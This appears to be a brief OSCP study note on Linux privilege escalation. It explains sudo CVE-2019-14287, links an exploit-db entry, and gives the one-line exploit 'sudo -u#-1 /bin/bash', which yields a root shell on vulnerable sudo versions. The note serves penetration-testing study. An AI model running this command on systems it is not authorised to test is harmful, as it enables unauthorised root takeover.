// notes/ PrivEsc — Linux
🐧
Sudo CVE 2019 14287 Sudo U 1 Bin Bash
{% embed url="<https://www.exploit-db.com/exploits/47502" %}
#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/sudo_cve-2019-14287-sudo-u-1-bin-bash ↗CVE-2019-14287 (sudo -u#-1 /bin/bash)
{% embed url="https://www.exploit-db.com/exploits/47502" %}
This can be used to take over any user account on the system, simple and straight forward.
py01Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv02-u#-1 returns as 0 which is root's id
code
01sudo -u#-1 /bin/bash